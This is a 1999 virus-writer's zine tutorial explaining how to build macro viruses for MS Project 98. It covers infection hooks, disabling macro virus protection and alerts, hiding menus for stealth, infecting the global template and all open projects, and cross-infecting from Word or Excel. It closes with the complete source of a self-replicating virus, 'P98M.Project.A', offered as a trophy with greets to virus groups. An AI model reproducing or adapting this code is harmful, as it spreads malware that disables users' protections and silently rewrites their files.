MS Project Infectors
by jackie /LineZer0 /Metaphase
Introduction
On Oct 26,1999 Data Fellows first reported the birth of a new infection platform. Someone wrote a piece of code that was able to infect the MS Project application. Corner, it's name, is a cross application macro between Word97/2K and Project98. The only information about this virus is taken from Data Fellows virus information page. I wanted to give you the source here, but it seems that only the AV community has the source. If someone has it, please mail it to me! Accourding to Data Fellow virus description, Corner (original name in virus code is 'Closer') infects Word in the common way, and is not resident in the template of Project98. It adds a blank project file and infects it. I think that all cross infection is done with ActiveX communication between the two applications.
MS Project
What is MS Project? MS Project is accourding the manual an easy to handle and powerful project tool. I only have an evaluation version especially for this tutorial. Like any other Office application, MS Project does have the build in macro language VBA. So if you are a macro coder, you will find your way very very soon. MS Project does also have a global template like in Word, but it is not so easy to access this template, but after a few hours starring at the screen, I found a way to infect it. ;)
So first let us take a look on the infection hooks that are available or with any sense for us:
Project_Activate
Whenever our infected project book gets activated, due change of windows, or opening, whatever.
Project_Deactivate
This hook gets active when our infected project book is the active one and a new one gets opened, or selected, whatever.
Project_Close
Like the name says, when our project book gets closed, this hook does it's work.
Project_Open
The same as close but only on opening a project book.
In my opinion Project_Close and Project_Open are the main hooks for writing a project macro, but use as you like.
So now let us look at a common infection sceme:
Changing some options
Due MS Project is part of Office package, the common commands of setting options is nearly the same. Use the following commands:
Application.EnableCancelKey = pjDisabled
Disables the ESC key while executing a macro.
Application.DisplayAlerts = False
To stop the displaying of errors.
Application.MacroVirusProtection = False
To disable the macro virus protection. ;)
Application.DisplayStatusBar = False
To hide the status bar at the bottom of the window, that our user doesn't see when the book is saved or whatever.
CommandBars("Tools").Controls(9).Enabled = False
CommandBars("Tools").Controls(12).Enabled = False
Use this to have a bit of basic stealth for your Project macro bug. It disables Tools/Macro and Tools/Options.
Checking and Infecting template
As I got this application and heard that the first macro of this kind is not resisdent in the template, my main goal was to make it resisdent. ;) So I took a seat, looked at the whole help file and found more sand in my pocket than help on how to access this global template in this help file. After starring hours and hours into the screen I got an idea and it worked! Due the cause that you can't access this global template as easy as in Word, you have to use some tricks.
So first I took a look at the project window of the Visual Basic Editor, looked and looked, then some idea popped up in my mind: 'What if i access the project?' This idea worked out as you can see below...
With Application.VBE.VBProjects(1).VBComponents(1).CodeModule
The first project is always the global template project, so we access this to get access to the class object, 'ThisProject' of the global template. You can also use 'ProjectGlobal' instead of the '1' in VBProjects for the case that someone renames the VBA Project, which seems where unlikely. So it's a good decision to use the '1'.
If .Lines(1, 1) <> "'Project" Then
Check if the first line isn't equal to our marker
.DeleteLines 1, .CountOfLines
Delete all lines if the marker isn't right
.InsertLines 1, OurCode
Insert our viral code then
End If
End With
This works good. So here you have the code to make a resident macro bug for MS Project but remember, I did it first...hehe.
Checking and infecting projects
It is a good idea infecting all open project books at once. So there are a few things you should look out for but I will explain them. It is a problem to save the infected book after infection, cause you can only save the active project file. So you need to activate it before saving, otherwise all books will be saved under the same names.
To infect all open projects just do a simple 'for/next' loop:
For x = 1 To Projects.Count
Create a loop from one to the number of all opened project files
With Projects(x).VBProject.VBComponents(1).CodeModule
If .Lines(1, 1) <> "'Project" Then
If the first line in the class object 'ThisProject' isn't equal to our marker, then
.DeleteLines 1, .CountOfLines
delete all lines in the class
.InsertLines 1, OurCode
and insert our viral code there.
Projects(x).Activate
Activate the current infected project file to prepare everything for saving it.
FileSaveAs Projects(x).FullName
Save the file under it's fullname.
End If
End With
Next
Jump next file.
We need to activate the project file, that it is saved under the right name. Otherwise all files will be saved under the name of the activated project.
Cross application infection
Well, cross infection. First I had no clue what the ActiveX class name of MS Project would be, but after a short while I found it in the windows registry. So if you want to use a MS Project as a cross infection part, then you have to change the name of the sub routine from 'Private Sub Project_Open(ByVal pj As MSProject.Project)' to 'Private Sub Project_Open()' or whatever you like, in the other part of the cross infection for example in Word or Excel the original sub name 'Private Sub Project_Open(ByVal pj As MSProject.Project)' will force an error, because ByVal is not definied but you have to change it back if you infect MS Project from Word or Excel so that our infection hook works correct. If you don't understand it here, you will see what I mean if you write your own cross infector. So I wrote this little piece of code here to infect MS Project from another MS Office application:
If Application.UserName <> "Empty" Then
I use this to prevent re-infection of MS Project everytime our routine runs.
Set CrossObj = GetObject(, "msproject.application")
Check if MS Project is open. As you see use 'MSProject.Application' as the class for ActiveX communication.
If CrossObj = "" Then _
Set CrossObj = CreateObject("msproject.application"): _
QuitUs = 1
If MS Project is not open, create a hidden communication and set our marker if we have to quit the hidden started application.
With CrossObj.Application.VBE.VBProjects(1).VBComponents(1).CodeModule
The first project is always the global template project, so we access this to get access to the class object, 'ThisProject' of the global template.
.DeleteLines 1, .CountOfLines
Delete all lines from the class object
.InsertLines 1, OurCode
Insert our virulant code
Application.UserName = "Empty"
Set the user name to 'Empty' to prevent re-infection
End With If QuitUs = 1 Then CrossObj.Quit
If we started a new application we have to quit it again.
End If
Well, this whole routine is taken from Empty which is an three application cross infector written by me. Check latest zines for the code.
Conclusion
So three days after the birth of the first MS Project infector ever, I am proud to present you the first resisdent MS Project only in- fector. I am sure when I say that this may not be perfect, but I just did it for my own couriosity (and to be the first..hehe). So if someone has the original source of 'Corner' so please send it to me! Also I would like to say thanks to Darkman who brought me to the idea to write such a MS Project infector. This one is for you! Also a big thanks to my man Zer0 how made all this possible, he gave me the url to download my MS Project trial version! Thanks
Have phun, jackie [1999]
Greets and Thanks
LineZer0 Network - Kewl people, kewl group! Lz0NT#2 will roq! Metaphase - What about Meta#2? 29A - I am proud to help ya guys! Slagehammer - Thanks for your support all the time! Darkman - Here you are! Thanks for everything HeXcrasher - Phunny to see how everything's developed? Zer0 - Thanks for the url, without you this won't be! Flashkid - DiABLO roqs! Do you have some mana drink for me? Flitnic - You roq! Gigabyte - Got enough horror this helloween? Spo0ky - Hope we can meet IRL someday Fletcher - You can't believe it ha? Sokrates - Fuck shit up! What goes around comes around! Evul - Thanks for all your help all the time! h31x0r - I am drowning in my own self-pity ;( Anti State Tortoise - Heya man, mail me back! May we can merge? All on #virus, #vx - Great channels, great people All I forgot - I love you all, you are beautiful
-!NEVER FORGET TO APPRECIATE THE WORK OF OTHER PEOPLE!-
As a bonus, here the original source code of the second macro which infects MS Project98, the first one which is resisdent in the global template of MS Project98 and only infects Project files. ( *.MPP ) I could have added a polymorphic routine to change the variables, but I only had two variables, so I thougt that it is not necessary this time...look out Project98/Word97-2K/Excel97-2K.Empty for such a thingie...;)
P98M.Project.A
Especially for 29A #4
!Do not spread!
=-=[code starts here]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
'Project
Private Sub Project_Open(ByVal pj As MSProject.Project)
On Error Resume Next
Application.EnableCancelKey = pjDisabled
Application.DisplayAlerts = False
Application.MacroVirusProtection = False
Application.DisplayStatusBar = False
CommandBars("Tools").Controls(9).Enabled = False
CommandBars("Tools").Controls(12).Enabled = False
OurCode = ThisProject.VBProject.VBComponents(1).CodeModule.Lines(1, 32)
Current = ActiveProject.Name
With Application.VBE.VBProjects(1).VBComponents(1).CodeModule
If .Lines(1, 1) <> "'Project" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, OurCode
End If
End With
For x = 1 To Projects.Count
With Projects(x).VBProject.VBComponents(1).CodeModule
If .Lines(1, 1) <> "'Project" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, OurCode
Projects(x).Activate
FileSaveAs Projects(x).FullName
End If
End With
Next
If Projects.Count > 1 Then Projects(Current).Activate
If Day(Now) = Int(Rnd * 31) + 1 Then MsgBox ".-=-=-=-=-=-=-=-=-=-=-." _
& vbCr & "| watch people fear! |" & vbCr & "`-=-=-=-=-=-=-=-=-=-=-´", 0, _
"P98M/Project.A"
End Sub
'P98M.Project.A by jackie /LineZer0/Metaphase | Darkie, what's up?
'Worlds first resident MS Project infector | Oct 29, 1999
=-=[end of code]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Where ya been, where ya from, where ya going to, where are you going?
What goes around, comes around
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
URL to download MS Project: http://www.netpar.com.br/njpj/t_appz.htm
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-